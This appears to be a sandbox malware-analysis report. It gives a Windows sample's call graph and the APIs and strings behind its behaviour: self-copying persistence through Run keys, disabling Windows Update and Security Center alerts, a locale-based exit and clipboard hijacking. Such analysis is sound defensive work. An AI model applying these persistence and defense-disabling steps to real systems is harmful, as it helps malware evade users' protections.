40db94 5801 40dba5 WaitForSingleObject 5800->5801 5803 40dbbf 5800->5803 5802 401330 8 API calls 5801->5802 5802->5803 5805 401483 5804->5805 5806 401572 5804->5806 5805->5806 5807 40a320 7 API calls 5805->5807 5806->5800 5808 401498 CreateEventA socket 5807->5808 5809 4014d5 5808->5809 5810 4014cf 5808->5810 5809->5806 5812 4014e2 htons setsockopt bind 5809->5812 5811 401330 8 API calls 5810->5811 5811->5809 5813 401546 5812->5813 5814 401558 CreateThread 5812->5814 5815 401330 8 API calls 5813->5815 5814->5806 5817 401100 20 API calls _invalid_parameter 5814->5817 5816 40154c 5815->5816 5816->5800 5579 4069c8 5586 40696e 5579->5586 5580 40699e lstrcmpiW 5580->5586 5581 406b19 FindNextFileW 5582 406942 lstrcmpW 5581->5582 5583 406b35 FindClose 5581->5583 5585 406958 lstrcmpW 5582->5585 5582->5586 5588 406b42 5583->5588 5584 406a05 PathMatchSpecW 5584->5586 5589 406a26 wsprintfW SetFileAttributesW DeleteFileW 5584->5589 5585->5586 5586->5580 5586->5581 5586->5584 5587 406a83 PathFileExistsW 5586->5587 5592 406510 11 API calls 5586->5592 5587->5586 5590 406a99 wsprintfW wsprintfW 5587->5590 5589->5586 5590->5586 5591 406b03 MoveFileExW 5590->5591 5591->5581 5592->5586 5593 401f50 GetQueuedCompletionStatus 5594 401f92 5593->5594 5595 402008 5593->5595 5596 401f97 WSAGetOverlappedResult 5594->5596 5600 401d60 5594->5600 5596->5594 5597 401fb9 WSAGetLastError 5596->5597 5597->5594 5599 401fd3 GetQueuedCompletionStatus 5599->5594 5599->5595 5601 401ef2 InterlockedDecrement setsockopt closesocket 5600->5601 5602 401d74 5600->5602 5619 401e39 5601->5619 5602->5601 5603 401d7c 5602->5603 5620 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5603->5620 5605 401d81 InterlockedExchange 5606 401d98 5605->5606 5607 401e4e 5605->5607 5612 401da9 InterlockedDecrement 5606->5612 5613 401dbc InterlockedDecrement InterlockedExchangeAdd 5606->5613 5606->5619 5608 401e67 5607->5608 5609 401e57 InterlockedDecrement 5607->5609 5610 401e72 5608->5610 5611 401e87 InterlockedDecrement 5608->5611 5609->5599 5629 401ae0 WSASend 5610->5629 5615 401ee9 5611->5615 5612->5599 5616 401e2f 5613->5616 5615->5599 5621 401cf0 5616->5621 5617 401e7e 5617->5599 5619->5599 5620->5605 5622 401d00 InterlockedExchangeAdd 5621->5622 5623 401cfc 5621->5623 5624 401d53 5622->5624 5625 401d17 InterlockedIncrement 5622->5625 5623->5619 5624->5619 5635 401c50 WSARecv 5625->5635 5627 401d46 5627->5624 5628 401d4c InterlockedDecrement 5627->5628 5628->5624 5630 401b50 5629->5630 5631 401b12 WSAGetLastError 5629->5631 5630->5617 5631->5630 5632 401b1f 5631->5632 5633 401b56 5632->5633 5634 401b26 Sleep WSASend 5632->5634 5633->5617 5634->5630 5634->5631 5636 401cd2 5635->5636 5637 401c8e 5635->5637 5636->5627 5638 401c90 WSAGetLastError 5637->5638 5639 401ca4 Sleep WSARecv 5637->5639 5640 401cdb 5637->5640 5638->5636 5638->5637 5639->5636 5639->5638 5640->5627 5818 40d490 5824 4021b0 5818->5824 5821 40d4cf 5822 40d4b5 WaitForSingleObject 5828 401600 5822->5828 5825 4021bb 5824->5825 5827 4021cf 5824->5827 5825->5827 5849 402020 5825->5849 5827->5821 5827->5822 5829 401737 5828->5829 5830 40160d 5828->5830 5829->5821 5830->5829 5831 401619 EnterCriticalSection 5830->5831 5832 4016b5 LeaveCriticalSection SetEvent 5831->5832 5837 401630 5831->5837 5833 4016d0 5832->5833 5834 4016e8 5832->5834 5835 4016d6 PostQueuedCompletionStatus 5833->5835 5836 40d860 11 API calls 5834->5836 5835->5834 5835->5835 5839 4016f3 5836->5839 5837->5832 5838 401641 InterlockedDecrement 5837->5838 5840 40165a InterlockedExchangeAdd 5837->5840 5847 4016a0 InterlockedDecrement 5837->5847 5838->5837 5841 40d9a0 7 API calls 5839->5841 5840->5837 5842 40166d InterlockedIncrement 5840->5842 5843 4016fc CloseHandle CloseHandle WSACloseEvent 5841->5843 5844 401c50 4 API calls 5842->5844 5870 40b0d0 shutdown closesocket 5843->5870 5844->5837 5846 401724 DeleteCriticalSection 5848 40a740 _invalid_parameter 3 API calls 5846->5848 5847->5837 5848->5829 5850 40a320 7 API calls 5849->5850 5851 40202b 5850->5851 5852 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5851->5852 5858 4021a5 5851->5858 5853 402076 CreateIoCompletionPort 5852->5853 5854 40219f 5852->5854 5853->5854 5855 40208f 5853->5855 5856 401600 36 API calls 5854->5856 5857 40d6c0 8 API calls 5855->5857 5856->5858 5859 402094 5857->5859 5858->5827 5859->5854 5860 40209f WSASocketA 5859->5860 5860->5854 5861 4020bd setsockopt htons bind 5860->5861 5861->5854 5862 402126 listen 5861->5862 5862->5854 5863 40213a WSACreateEvent 5862->5863 5863->5854 5864 402147 WSAEventSelect 5863->5864 5864->5854 5868 402159 5864->5868 5865 40217f 5866 40d6f0 17 API calls 5865->5866 5869 402194 5866->5869 5867 40d6f0 17 API calls 5867->5868 5868->5865 5868->5867 5869->5827 5870->5846 5871 405910 GetWindowLongW 5872 405934 5871->5872 5873 405956 5871->5873 5874 405941 5872->5874 5875 4059c7 IsClipboardFormatAvailable 5872->5875 5876 405951 5873->5876 5882 4059a6 5873->5882 5883 40598e SetWindowLongW 5873->5883 5879 405964 SetClipboardViewer SetWindowLongW 5874->5879 5880 405947 5874->5880 5877 4059e3 IsClipboardFormatAvailable 5875->5877 5878 4059da 5875->5878 5881 405b44 DefWindowProcA 5876->5881 5877->5878 5885 4059f8 IsClipboardFormatAvailable 5877->5885 5887 405a15 OpenClipboard 5878->5887 5888 405adc 5878->5888 5879->5881 5880->5876 5886 405afd RegisterRawInputDevices ChangeClipboardChain 5880->5886 5882->5876 5884 4059ac SendMessageA 5882->5884 5883->5876 5884->5876 5885->5878 5886->5881 5887->5888 5890 405a25 GetClipboardData 5887->5890 5888->5876 5889 405ae5 SendMessageA 5888->5889 5889->5876 5890->5876 5891 405a3d GlobalLock 5890->5891 5891->5876 5892 405a55 5891->5892 5893 405a68 5892->5893 5894 405a89 5892->5894 5895 405a9e 5893->5895 5896 405a6e 5893->5896 5897 405630 13 API calls 5894->5897 5912 405750 5895->5912 5898 405a74 GlobalUnlock CloseClipboard 5896->5898 5906 405510 5896->5906 5897->5898 5898->5888 5902 405ac7 5898->5902 5920 4048a0 lstrlenW 5902->5920 5905 40a740 _invalid_parameter 3 API calls 5905->5888 5907 40551b 5906->5907 5908 405521 lstrlenW 5907->5908 5909 40a530 __aligned_recalloc_base 7 API calls 5907->5909 5910 405551 lstrcpynW 5907->5910 5911 405534 5907->5911 5908->5907 5908->5911 5909->5907 5910->5907 5910->5911 5911->5898 5917 40575d 5912->5917 5913 405763 lstrlenA 5913->5917 5918 405776 5913->5918 5914 4055d0 2 API calls 5914->5917 5915 40a530 __aligned_recalloc_base 7 API calls 5915->5917 5917->5913 5917->5914 5917->5915 5917->5918 5919 40a740 _invalid_parameter 3 API calls 5917->5919 5957 405700 5917->5957 5918->5898 5919->5917 5927 4048d4 5920->5927 5921 404d5e StrStrW 5922 404d71 5921->5922 5923 404d75 StrStrW 5921->5923 5922->5923 5925 404d88 5923->5925 5926 404d8c StrStrW 5923->5926 5924 404ae2 5924->5905 5925->5926 5928 404d9f 5926->5928 5927->5924 5931 404c69 StrStrW 5927->5931 5934 404af4 5927->5934 5928->5924 5929 404e09 isalpha 5928->5929 5937 404e43 5928->5937 5929->5928 5930 404e20 isdigit 5929->5930 5930->5924 5930->5928 5932 404c94 StrStrW 5931->5932 5931->5934 5933 404cbf StrStrW 5932->5933 5932->5934 5933->5934 5934->5921 5934->5924 5935 405351 StrStrW 5940 405364 5935->5940 5941 40536b StrStrW 5935->5941 5936 405303 StrStrW 5938 405316 5936->5938 5939 40531d StrStrW 5936->5939 5937->5935 5937->5936 5938->5939 5942 405330 5939->5942 5943 405337 StrStrW 5939->5943 5940->5941 5944 405385 StrStrW 5941->5944 5945 40537e 5941->5945 5942->5943 5943->5935 5948 40534a 5943->5948 5946 405398 5944->5946 5947 40539f StrStrW 5944->5947 5945->5944 5946->5947 5949 4053b2 5947->5949 5950 4053b9 StrStrW 5947->5950 5948->5935 5949->5950 5951 4053cc lstrlenA 5950->5951 5951->5924 5953 405492 GlobalAlloc 5951->5953 5953->5924 5954 4054ad GlobalLock 5953->5954 5954->5924 5955 4054c0 memcpy GlobalUnlock OpenClipboard 5954->5955 5955->5924 5956 4054ed EmptyClipboard SetClipboardData CloseClipboard 5955->5956 5956->5924 5958 40570b 5957->5958 5959 405711 lstrlenA 5958->5959 5960 4055d0 2 API calls 5958->5960 5961 405744 5958->5961 5959->5958 5960->5958 5961->5917 5641 4080d9 5642 4080e2 5641->5642 5643 4080f1 34 API calls 5642->5643 5644 408f26 5642->5644 5974 405f1d 5976 405eb1 5974->5976 5975 405f1b 5977 40a740 _invalid_parameter 3 API calls 5975->5977 5976->5975 5979 405f06 memcpy 5976->5979 5978 405f28 LeaveCriticalSection 5977->5978 5979->5975 5981 40a81e 5982 40a740 _invalid_parameter 3 API calls 5981->5982 5983 40a7dd 5982->5983 5984 40a530 __aligned_recalloc_base 7 API calls 5983->5984 5985 40a7f2 5983->5985 5986 40a7f4 memcpy 5983->5986 5984->5983 5986->5983 5645 40d660 5650 401b60 5645->5650 5647 40d675 5648 40d694 5647->5648 5649 401b60 16 API calls 5647->5649 5649->5648 5651 401c42 5650->5651 5652 401b70 5650->5652 5651->5647 5652->5651 5653 40a320 7 API calls 5652->5653 5654 401b9d 5653->5654 5654->5651 5655 40a7b0 8 API calls 5654->5655 5656 401bc9 5655->5656 5657 401be6 5656->5657 5658 401bd6 5656->5658 5660 401ae0 4 API calls 5657->5660 5659 40a740 _invalid_parameter 3 API calls 5658->5659 5661 401bdc 5659->5661 5662 401bf3 5660->5662 5661->5647 5663 401c33 5662->5663 5664 401bfc EnterCriticalSection 5662->5664 5667 40a740 _invalid_parameter 3 API calls 5663->5667 5665 401c13 5664->5665 5666 401c1f LeaveCriticalSection 5664->5666 5665->5666 5666->5647 5668 401c3c 5667->5668 5669 40a740 _invalid_parameter 3 API calls 5668->5669 5669->5651 5670 40da60 5671 40bb00 194 API calls 5670->5671 5672 40da98 5671->5672 5673 40dae0 5683 4013b0 5673->5683 5675 40daed 5676 40b790 5 API calls 5675->5676 5677 40db07 InterlockedExchangeAdd 5675->5677 5678 40db4b WaitForSingleObject 5675->5678 5680 40bab0 13 API calls 5675->5680 5682 40db6d 5675->5682 5676->5675 5677->5675 5677->5678 5678->5675 5679 40db64 5678->5679 5695 401330 5679->5695 5680->5675 5684 40a320 7 API calls 5683->5684 5685 4013bb CreateEventA socket 5684->5685 5686 4013f2 5685->5686 5687 4013f8 5685->5687 5688 401330 8 API calls 5686->5688 5689 401401 bind 5687->5689 5690 401462 5687->5690 5688->5687 5691 401444 CreateThread 5689->5691 5692 401434 5689->5692 5690->5675 5691->5690 5705 401100 5691->5705 5693 401330 8 API calls 5692->5693 5694 40143a 5693->5694 5694->5675 5696 401339 5695->5696 5697 40139b 5695->5697 5696->5697 5698 401341 SetEvent WaitForSingleObject CloseHandle 5696->5698 5697->5682 5699 40138b 5698->5699 5703 401369 5698->5703 5734 40b0d0 shutdown closesocket 5699->5734 5701 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5701->5703 5702 401395 5704 40a740 _invalid_parameter 3 API calls 5702->5704 5703->5699 5703->5701 5704->5697 5706 401115 ioctlsocket 5705->5706 5707 4011e4 5706->5707 5713 40113a 5706->5713 5708 40a740 _invalid_parameter 3 API calls 5707->5708 5710 4011ea 5708->5710 5709 4011cd WaitForSingleObject 5709->5706 5709->5707 5711 40a570 9 API calls 5711->5713 5712 401168 recvfrom 5712->5709 5712->5713 5713->5709 5713->5711 5713->5712 5714 4011ad InterlockedExchangeAdd 5713->5714 5716 401000 5714->5716 5717 401014 5716->5717 5718 40103b 5717->5718 5719 40a320 7 API calls 5717->5719 5727 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5718->5727 5719->5718 5721 40105b 5728 401580 5721->5728 5723 4010ec 5723->5713 5724 401071 5724->5723 5725 4010a3 IsBadReadPtr 5724->5725 5726 4010d8 memmove 5724->5726 5725->5724 5726->5724 5727->5721 5729 401592 5728->5729 5730 4015a5 memcpy 5728->5730 5731 40a570 9 API calls 5729->5731 5732 4015c1 5730->5732 5733 40159f 5731->5733 5732->5724 5733->5730 5734->5702 5735 40d4e0 5736 40d54e 5735->5736 5737 40d4f6 5735->5737 5737->5736 5738 40d500 5737->5738 5739 40d553 5737->5739 5740 40d5a3 5737->5740 5741 40a320 7 API calls 5738->5741 5743 40d578 5739->5743 5744 40d56b InterlockedDecrement 5739->5744 5769 40c150 5740->5769 5745 40d50d 5741->5745 5747 40a740 _invalid_parameter 3 API calls 5743->5747 5744->5743 5758 4023d0 5745->5758 5746 40d5c9 5746->5736 5756 40d601 IsBadReadPtr 5746->5756 5757 40bb00 194 API calls 5746->5757 5774 40c250 5746->5774 5749 40d584 5747->5749 5750 40a740 _invalid_parameter 3 API calls 5749->5750 5750->5736 5754 40d53b InterlockedIncrement 5754->5736 5756->5746 5757->5746 5759 402413 5758->5759 5760 4023d9 5758->5760 5762 40b2d0 5759->5762 5760->5759 5761 4023ea InterlockedIncrement 5760->5761 5761->5759 5763 40b360 2 API calls 5762->5763 5764 40b2df 5763->5764 5765 40b2e9 5764->5765 5766 40b2ed EnterCriticalSection 5764->5766 5765->5736 5765->5754 5767 40b30c LeaveCriticalSection 5766->5767 5767->5765 5770 40c163 5769->5770 5771 40c18d memcpy 5769->5771 5772 40a570 9 API calls 5770->5772 5771->5746 5773 40c184 5772->5773 5773->5771 5775 40c279 5774->5775 5776 40c26e 5774->5776 5775->5776 5777 40c291 memmove 5775->5777 5776->5746 5777->5776 5987 40d020 5988 40b2d0 4 API calls 5987->5988 5989 40d033 5988->5989 5990 40d060 208 API calls 5989->5990 5991 40d04a 5989->5991 5990->5991 5992 401920 GetTickCount WaitForSingleObject 5993 401ac9 5992->5993 5994 40194d WSAWaitForMultipleEvents 5992->5994 5995 4019f0 GetTickCount 5994->5995 5996 40196a WSAEnumNetworkEvents 5994->5996 5997 401a43 GetTickCount 5995->5997 5998 401a05 EnterCriticalSection 5995->5998 5996->5995 6012 401983 5996->6012 5999 401ab5 WaitForSingleObject 5997->5999 6000 401a4e EnterCriticalSection 5997->6000 6001 401a16 5998->6001 6002 401a3a LeaveCriticalSection 5998->6002 5999->5993 5999->5994 6004 401aa1 LeaveCriticalSection GetTickCount 6000->6004 6005 401a5f InterlockedExchangeAdd 6000->6005 6006 401a29 LeaveCriticalSection 6001->6006 6034 401820 6001->6034 6002->5999 6003 401992 accept 6003->5995 6003->6012 6004->5999 6052 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 6005->6052 6006->5999 6010 401a72 6010->6004 6010->6005 6053 40b0d0 shutdown closesocket 6010->6053 6012->5995 6012->6003 6013 401cf0 7 API calls 6012->6013 6014 4022c0 6012->6014 6013->5995 6015 4022d2 EnterCriticalSection 6014->6015 6016 4022cd 6014->6016 6017 4022e7 6015->6017 6018 4022fd LeaveCriticalSection 6015->6018 6016->6012 6017->6018 6019 402308 6018->6019 6020 40230f 6018->6020 6019->6012 6021 40a320 7 API calls 6020->6021 6022 402319 6021->6022 6023 402326 getpeername CreateIoCompletionPort 6022->6023 6024 4023b8 6022->6024 6025 4023b2 6023->6025 6026 402366 6023->6026 6056 40b0d0 shutdown closesocket 6024->6056 6029 40a740 _invalid_parameter 3 API calls 6025->6029 6054 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 6026->6054 6029->6024 6030 4023c3 6030->6012 6031 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6055 4021e0 EnterCriticalSection LeaveCriticalSection 6031->6055 6033 4023ab 6033->6012 6035 40190f 6034->6035 6036 401830 6034->6036 6035->6002 6036->6035 6037 40183d InterlockedExchangeAdd 6036->6037 6037->6035 6043 401854 6037->6043 6038 401880 6039 401891 6038->6039 6066 40b0d0 shutdown closesocket 6038->6066 6041 4018a7 InterlockedDecrement 6039->6041 6044 401901 6039->6044 6041->6044 6043->6035 6043->6038 6057 4017a0 EnterCriticalSection 6043->6057 6045 402247 6044->6045 6046 402265 EnterCriticalSection 6044->6046 6045->6002 6047 40229c LeaveCriticalSection DeleteCriticalSection 6046->6047 6050 40227d 6046->6050 6048 40a740 _invalid_parameter 3 API calls 6047->6048 6048->6045 6049 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6049->6050 6050->6049 6051 40229b 6050->6051 6051->6047 6052->6010 6053->6010 6054->6031 6055->6033 6056->6030 6058 401807 LeaveCriticalSection 6057->6058 6059 4017ba InterlockedExchangeAdd 6057->6059 6058->6043 6060 4017ca LeaveCriticalSection 6059->6060 6061 4017d9 6059->6061 6060->6043 6062 40a740 _invalid_parameter 3 API calls 6061->6062 6063 4017fe 6062->6063 6064 40a740 _invalid_parameter 3 API calls 6063->6064 6065 401804 6064->6065 6065->6058 6066->6039 5778 405fe5 5779 405f5e 5778->5779 5780 405fea LeaveCriticalSection 5779->5780 5781 40a7b0 8 API calls 5779->5781 5782 405fbc 5781->5782 5782->5780 6067 406ba6 6070 406b88 6067->6070 6068 406cc8 Sleep 6068->6070 6069 406bb9 6071 406260 4 API calls 6069->6071 6070->6068 6070->6069 6072 406cd8 ExitThread 6070->6072 6074 406340 4 API calls 6070->6074 6073 406bca 6071->6073 6075 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6073->6075 6078 406beb 6073->6078 6074->6070 6076 406c66 wsprintfW 6075->6076 6077 406c7b wsprintfW 6075->6077 6076->6077 6079 406650 51 API calls 6077->6079 6079->6078 6080 40f42c 6081 40f434 6080->6081 6082 40f4e8 6081->6082 6086 40f669 6081->6086 6085 40f46d 6085->6082 6090 40f554 RtlUnwind 6085->6090 6087 40f67e 6086->6087 6089 40f69a 6086->6089 6088 40f709 NtQueryVirtualMemory 6087->6088 6087->6089 6088->6089 6089->6085 6091 40f56c 6090->6091 6091->6085 6092 40dab0 6095 401200 6092->6095 6094 40dad2 6096 401314 6095->6096 6097 40121d 6095->6097 6096->6094 6097->6096 6098 40a530 __aligned_recalloc_base 7 API calls 6097->6098 6099 401247 memcpy htons 6098->6099 6100 4012ed 6099->6100 6101 401297 sendto 6099->6101 6104 40a740 _invalid_parameter 3 API calls 6100->6104 6102 4012b6 InterlockedExchangeAdd 6101->6102 6103 4012e9 6101->6103 6102->6101 6105 4012cc 6102->6105 6103->6100 6106 40130a 6103->6106 6107 4012fc 6104->6107 6109 40a740 _invalid_parameter 3 API calls 6105->6109 6108 40a740 _invalid_parameter 3 API calls 6106->6108 6107->6094 6108->6096 6110 4012db 6109->6110 6110->6094 6111 40b9b0 6112 40b9b3 WaitForSingleObject 6111->6112 6113 40b9e1 6112->6113 6114 40b9cb InterlockedDecrement 6112->6114 6115 40b9da 6114->6115 6115->6112 6116 40b0f0 16 API calls 6115->6116 6116->6115 5797 4074f1 ExitThread 6117 40e6b1 6119 40e6ba 6117->6119 6118 40e7ad 6119->6118 6120 40e723 lstrcmpiW 6119->6120 6121 40e7a3 SysFreeString 6120->6121 6122 40e736 6120->6122 6121->6118 6123 40e4a0 2 API calls 6122->6123 6125 40e744 6123->6125 6124 40e795 6124->6121 6125->6121 6125->6124 6126 40e773 lstrcmpiW 6125->6126 6127 40e785 6126->6127 6128 40e78b SysFreeString 6126->6128 6127->6128 6128->6124 6129 40f434 6130 40f452 6129->6130 6131 40f4e8 6129->6131 6132 40f669 NtQueryVirtualMemory 6130->6132 6134 40f46d 6132->6134 6133 40f554 RtlUnwind 6133->6134 6134->6131 6134->6133

                                              Executed Functions

                                              Function 0040ECC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 95 40ecc0-40ecec GetLocaleInfoA strcmp 96 40ecf2 95->96 97 40ecee-40ecf0 95->97 98 40ecf4-40ecf7 96->98 97->98
                                              APIs
                                              • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040ECD3
                                              • strcmp.NTDLL ref: 0040ECE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocalestrcmp
                                              • String ID: UKR
                                              • API String ID: 3191669094-64918367
                                              • Opcode ID: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction ID: 77034b4ee665358b2559d06917653f26683f777e377fe2659d333d0cc479d80c
                                              • Opcode Fuzzy Hash: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction Fuzzy Hash: 19E02B32E4830876FA10BAA5AC03FEA375C9711701F000176FF05F21C1F6BA922A979B
                                              Function 00407500 Relevance: 289.5, APIs: 108, Strings: 57, Instructions: 784sleepfilesynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ecc0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 11 4075f0-4075f2 ExitProcess 3->11 12 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->12 6 407902-407922 RegOpenKeyExW 4->6 7 4078d6-4078fc RegSetValueExA RegCloseKey 4->7 9 407950-407970 RegOpenKeyExW 6->9 10 407924-40794a RegSetValueExA RegCloseKey 6->10 7->6 13 407972-407998 RegSetValueExA RegCloseKey 9->13 14 40799e-4079be RegOpenKeyExW 9->14 10->9 15 40764c-40767b SetFileAttributesW RegOpenKeyExW 12->15 16 4076de-407720 Sleep wsprintfW CopyFileW 12->16 13->14 17 4079c0-4079e6 RegSetValueExA RegCloseKey 14->17 18 4079ec-407a0c RegOpenKeyExW 14->18 15->16 21 40767d-4076b0 wcslen RegSetValueExW 15->21 22 407726-407755 SetFileAttributesW RegOpenKeyExW 16->22 23 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 16->23 17->18 19 407a0e-407a3a RegSetValueExA RegCloseKey 18->19 20 407a3f-407a5f RegOpenKeyExW 18->20 24 407ae4-407b04 RegOpenKeyExW 19->24 26 407a61-407a90 RegCreateKeyExW RegCloseKey 20->26 27 407a96-407ab6 RegOpenKeyExW 20->27 21->16 28 4076b2-4076d4 RegCloseKey call 40ef10 21->28 22->23 29 407757-40778a wcslen RegSetValueExW 22->29 23->4 25 407817-407846 SetFileAttributesW RegOpenKeyExW 23->25 32 407b06-407b32 RegSetValueExA RegCloseKey 24->32 33 407b37-407b57 RegOpenKeyExW 24->33 25->4 30 407848-40787b wcslen RegSetValueExW 25->30 26->27 27->24 31 407ab8-407ade RegSetValueExA RegCloseKey 27->31 28->16 43 4076d6-4076d8 ExitProcess 28->43 29->23 35 40778c-4077ae RegCloseKey call 40ef10 29->35 30->4 36 40787d-40789f RegCloseKey call 40ef10 30->36 31->24 37 407c33-407c53 RegOpenKeyExW 32->37 39 407b59-407b88 RegCreateKeyExW RegCloseKey 33->39 40 407b8e-407bae RegOpenKeyExW 33->40 35->23 49 4077b0-4077b2 ExitProcess 35->49 36->4 56 4078a1-4078a3 ExitProcess 36->56 46 407c81-407ca1 RegOpenKeyExW 37->46 47 407c55-407c7b RegSetValueExA RegCloseKey 37->47 39->40 44 407bb0-407bdf RegCreateKeyExW RegCloseKey 40->44 45 407be5-407c05 RegOpenKeyExW 40->45 44->45 45->37 53 407c07-407c2d RegSetValueExA RegCloseKey 45->53 50 407ca3-407cc9 RegSetValueExA RegCloseKey 46->50 51 407ccf-407cef RegOpenKeyExA 46->51 47->46 50->51 54 407cf5-407dd5 RegSetValueExA * 7 RegCloseKey 51->54 55 407ddb-407dfb RegOpenKeyExA 51->55 53->37 54->55 57 407e01-407ee1 RegSetValueExA * 7 RegCloseKey 55->57 58 407ee7-407efc Sleep call 40cd60 55->58 57->58 61 408071-40807a 58->61 62 407f02-40806e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40dbd0 call 406f70 CreateEventA call 40c490 call 40d6c0 call 40b850 call 40d6f0 * 4 call 40d860 call 40d9a0 58->62 62->61
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                              • CreateMutexA.KERNELBASE(00000000,00000000,55a4er5wo), ref: 0040751D
                                              • GetLastError.KERNEL32 ref: 00407529
                                              • ExitProcess.KERNEL32 ref: 00407538
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000105), ref: 00407572
                                              • PathFindFileNameW.SHLWAPI(C:\Users\user\Desktop\file.exe), ref: 0040757D
                                              • wsprintfW.USER32 ref: 0040759A
                                              • DeleteFileW.KERNELBASE(?), ref: 004075AA
                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                              • wcscmp.NTDLL ref: 004075D3
                                              • ExitProcess.KERNEL32 ref: 004075F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$55a4er5wo$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\Desktop\file.exe$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$sysmablsvr.exe
                                              • API String ID: 4172876685-3566645442
                                              • Opcode ID: 95bca734a32fc1ca3b6063aadf45f0f777810fdf47a36b8aa2289140a07bddb7
                                              • Instruction ID: a49710c48774a039d08af1d560b2319e957ec07716638a9d0d735a0d257e6f0f
                                              • Opcode Fuzzy Hash: 95bca734a32fc1ca3b6063aadf45f0f777810fdf47a36b8aa2289140a07bddb7
                                              • Instruction Fuzzy Hash: 9B5268B1B80318BBE7209B60DC4AFD93779AB48B11F1085A5F305B91D0DAF5A984CB5D
                                              Function 0040EF10 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
